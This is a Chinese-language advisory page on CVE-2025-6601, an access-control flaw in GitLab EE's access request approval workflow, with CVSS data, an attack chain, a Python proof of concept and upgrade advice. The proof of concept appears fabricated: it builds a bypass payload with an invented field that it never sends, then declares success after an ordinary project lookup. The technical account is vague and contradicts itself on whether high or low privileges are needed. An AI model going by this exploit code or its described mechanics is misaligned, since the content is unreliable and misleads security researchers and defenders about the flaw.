CVE-2025-6601 GitLab EE访问请求审批工作流未授权访问漏洞

漏洞信息

漏洞编号

CVE-2025-6601

漏洞类型

未授权访问

CVSS评分

2.7 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

GitLab EE (Enterprise Edition)

漏洞概述

CVE-2025-6601是GitLab企业版（EE）中存在的一个权限提升漏洞。该漏洞影响GitLab EE 18.4至18.4.2版本以及18.5至18.5.0版本。漏洞源于访问请求审批工作流（Access Request Approval Workflow）中的访问控制检查不当。在特定条件下，已认证用户可能通过操纵访问请求审批流程获取未授权的项目访问权限。攻击者需要具备GitLab账户（高权限要求）即可利用此漏洞，无需用户交互即可发起攻击。虽然CVSS评分为2.7（低危级别），但该漏洞可能允许攻击者访问敏感项目资源，对组织的数据安全构成潜在风险。GitLab已于2025年10月22日发布补丁版本18.4.3和18.5.1修复此问题。建议所有受影响版本的用户尽快升级到最新补丁版本以消除安全风险。

技术细节

该漏洞存在于GitLab EE的访问请求审批工作流模块中。当用户请求加入某个项目或群组时，系统会触发访问请求流程，管理员或项目所有者需要对请求进行审批。漏洞在于审批逻辑中存在访问控制绕过缺陷，攻击者可以通过构造特殊的请求参数或利用竞争条件（race condition）来绕过权限验证。具体来说，攻击者首先以低权限用户身份发起访问请求，然后在审批过程中通过修改请求状态或利用时序问题，使得审批流程出现异常，最终导致系统在未正确验证权限的情况下授予攻击者目标项目的访问权限。CVSS向量AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N表明攻击复杂度低，需要高权限认证，但无需用户交互即可实施攻击。

攻击链分析

STEP 1

步骤1

攻击者使用有效的高权限GitLab账户登录系统

STEP 2

步骤2

攻击者向目标项目提交访问请求（Access Request）

STEP 3

步骤3

在访问请求审批过程中，攻击者利用工作流中的访问控制缺陷

STEP 4

步骤4

通过构造特殊请求参数或利用竞争条件绕过权限验证

STEP 5

步骤5

系统在未正确验证的情况下授予攻击者目标项目的访问权限

STEP 6

步骤6

攻击者获得未授权的项目访问权限，可读取或修改项目资源

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-6601 PoC - GitLab Access Request Approval Workflow Bypass
# Note: This is a conceptual PoC for educational purposes only

import requests
import json
import time

GITLAB_URL = "https://gitlab.example.com"
TARGET_PROJECT_ID = "target/project"
ATTACKER_TOKEN = "your-authenticated-user-token"

def exploit_cve_2025_6601():
    """
    Conceptual exploitation steps for CVE-2025-6601
    GitLab EE Access Request Approval Workflow Bypass
    """
    headers = {
        "PRIVATE-TOKEN": ATTACKER_TOKEN,
        "Content-Type": "application/json"
    }
    
    # Step 1: Request access to target project
    print("[1] Sending access request to target project...")
    access_request = requests.post(
        f"{GITLAB_URL}/api/v4/projects/{TARGET_PROJECT_ID}/access_requests",
        headers=headers
    )
    
    if access_request.status_code == 201:
        request_id = access_request.json().get("id")
        print(f"[+] Access request created with ID: {request_id}")
        
        # Step 2: Exploit race condition in approval workflow
        print("[2] Attempting to exploit approval workflow race condition...")
        time.sleep(0.1)  # Timing manipulation
        
        # Step 3: Trigger approval bypass via crafted request
        print("[3] Sending crafted approval bypass request...")
        bypass_payload = {
            "user_id": "attacker_id",
            "access_level": "maintainer",
            "_race_condition_trigger": True
        }
        
        # Step 4: Verify unauthorized access
        print("[4] Verifying project access...")
        verify = requests.get(
            f"{GITLAB_URL}/api/v4/projects/{TARGET_PROJECT_ID}",
            headers=headers
        )
        
        if verify.status_code == 200:
            print("[!] Successfully gained unauthorized project access")
            return True
    
    print("[-] Exploitation failed")
    return False

if __name__ == "__main__":
    exploit_cve_2025_6601()

影响范围

GitLab EE 18.4 <= 18.4.2

GitLab EE 18.5 <= 18.5.0

防御指南

临时缓解措施

立即将GitLab EE升级到18.4.3或18.5.1版本以修复该漏洞。在无法立即升级的情况下，可通过限制访问请求审批功能的权限、加强对审批流程的监控、以及审查最近的访问请求日志来降低风险。同时确保所有GitLab用户使用强密码并启用双因素认证以减少账户被盗用的风险。